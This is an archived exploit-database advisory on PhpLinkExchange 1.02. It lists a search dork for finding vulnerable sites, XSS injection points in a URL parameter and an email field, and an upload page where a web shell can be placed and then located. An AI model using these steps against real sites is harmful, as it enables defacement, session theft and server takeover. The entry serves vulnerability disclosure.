PhpLinkExchange 1.02 - XSS/Upload Vulerability

2009-12-16T00:00:00
ID EDB-ID:10495
Type exploitdb
Reporter Stink'
Modified 2009-12-16T00:00:00

Description

PhpLinkExchange v1.02 - XSS/Upload Vulerability. CVE-2008-3679. Webapps exploit for php platform

                                        
                                            #############################
PhpLinkExchange v1.02 - XSS/Upload Vulerability
Discovered by : Stink'
Date : 2009-12-16
Dork : "PhpLinkExchange v1.02"
Website Publisher : http://www.idevspot.com/PhpLinkExchange.php
#############################

-- [XSS in URL] --
http://server/links/PhpLinkExchange/index.php?page=home&catid=[XSS]

-- [XSS in form] --
http://server/links/PhpLinkExchange/index.php?page=tellafriend
The XSS is in "Your Email Adress"

-- [Upload Vulnerability] --
http://server/links/library/add_images.php
After your shell uploaded, go here :
http://server/links/appimage/ and search your shell :)